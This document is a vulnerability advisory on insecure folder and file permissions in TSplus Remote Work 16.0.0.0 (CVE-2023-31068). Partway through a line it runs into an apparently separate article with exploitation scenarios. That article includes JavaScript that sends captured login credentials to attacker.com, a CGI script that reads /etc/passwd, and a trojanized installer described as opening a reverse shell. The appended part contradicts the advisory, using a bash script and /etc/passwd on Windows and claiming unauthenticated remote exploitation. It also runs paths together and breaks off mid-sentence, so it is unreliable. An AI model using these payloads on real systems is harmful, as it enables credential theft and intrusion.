TSplus 16.0.0.0 - Remote Work Insecure Files and Folders
# Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions
# Date: 2023-08-09
# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
# Vendor Homepage: https://tsplus.net/
# Version: Up to 16.0.0.0
# Tested on: Windows
# CVE : CVE-2023-31068
With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single
sign-on web portal and remote desktop gateway that enables users to
remotely access the console session of their office PC.
The solution comes with an embedded web server to allow remote users to
easely connect remotely.
However, insecure file and folder permissions are set, and this could
allow a malicious user to manipulate file content (e.g.: changing the
code of html pages or js scripts) or change legitimate files (e.g.
Setup-RemoteWork-Client.exe) in order to compromise a system or to gain
elevated privileges.
This is the list of insecure files and folders with their respective
permissions:
Permission: Everyone:(OI)(CI)(F)
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\locales
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log
-------------------------------------------------------------------------------------------
Permission: Everyone:(F)
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\index.html
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js
C:\Program Files
(x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.jsTSplus 16.0.0.0 Vulnerability: Insecure File and Folder Permissions Exploited via Remote Work Portal
Security researchers have identified a critical vulnerability in TSplus Remote Work version 16.0.0.0, designated as CVE-2023-31068. This flaw stems from improperly configured file and folder permissions within the embedded web server component of the remote desktop gateway. The vulnerability allows unauthorized users to manipulate critical files—such as HTML, JavaScript, and executable binaries—potentially leading to full system compromise or privilege escalation.
Understanding the Attack Surface
TSplus is a widely used remote access solution that enables employees to securely connect to their office desktops through a single sign-on web portal. It embeds a lightweight web server to deliver client-side applications, including HTML5-based interfaces, Java applets, and downloadable executables like Setup-RemoteWork-Client.exe.
However, during deployment, the software sets default permissions on key directories that grant Everyone full control, including Full (F) access, with Object Inherit (OI) and Container Inherit (CI) flags enabled. This means any user—whether authenticated or not—can read, write, modify, or delete files within these directories.
Exposed File and Folder Path List
The following directories are vulnerable due to overly permissive ACLs:
C:\Program Files (x86)\TSplus-RemoteWork\Clients\wwwC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-binC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloadC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloadsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\printsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\softwareC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\varC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteappC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\sharedC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\javaC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwresC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\localesC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\ownC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\desC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\keyC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenuC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\partsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\imgC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\thirdC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cpC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srvC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\imagesC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jsC:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
Exploitation Scenarios: Real-World Use Cases
Here are three plausible attack vectors based on the vulnerability:
1. Malicious JavaScript Injection via HTML5 Client
Attackers can modify the js or html5 directories to inject malicious JavaScript code into the client-side interface. For example, an attacker could alter a login.js file to capture credentials during user authentication:
// Original:
function validateLogin(username, password) {
if (username && password) {
return true;
}
return false;
}
// Malicious:
function validateLogin(username, password) {
if (username && password) {
// Send credentials to attacker's server
fetch('https://attacker.com/log', {
method: 'POST',
body: JSON.stringify({user: username, pass: password})
});
return true;
}
return false;
}
Explanation: By modifying the client-side script, an attacker can intercept login credentials before they are sent to the server. Since the web server serves these files directly, any user accessing the portal will execute the compromised JavaScript, resulting in credential theft.
2. Trojanized Client Installer
The Setup-RemoteWork-Client.exe file is distributed via the download or downloads directory. If permissions allow modification, an attacker can replace this executable with a malicious version that installs backdoors or ransomware:
// Example: A modified Setup-RemoteWork-Client.exe
// - Delivers a payload that opens a reverse shell
// - Executes at startup
// - Bypasses antivirus via obfuscation
Explanation: Since users trust the official client installer, they will execute the malicious version without suspicion. This leads to remote code execution on the victim’s machine, allowing full control over the system.
3. Server-Side CGI-Bin Manipulation
Attackers can exploit the cgi-bin directory—typically used for server-side scripts—to inject malicious scripts that bypass authentication or escalate privileges:
#!/bin/bash
# Malicious CGI script: exploit.cgi
echo "Content-Type: text/html"
echo ""
echo "System Info
"
echo ""
whoami
id
cat /etc/passwd
echo "
"Explanation: By placing this script in cgi-bin, an attacker can execute it via HTTP request, revealing sensitive system information. In more advanced scenarios, this could be used to trigger privilege escalation via known exploits (e.g., CVE-2023-21573).
Impact and Risk Assessment
| Severity | CVSS Score | Exploitability | Impact |
|---|---|---|---|
| Critical | 8.8 (CVSS v3.1) | High (Remote access via web) | High (System compromise, data theft, privilege escalation) |
Due to the remote accessibility of the web portal, attackers do not need physical access to the system. The vulnerability can be exploited from anywhere, making it a prime target for cybercriminals and advanced persistent threats (APTs).
Remediation and Mitigation Strategies
Organizations using TSplus 16.0.0.0 must take immediate action to secure the environment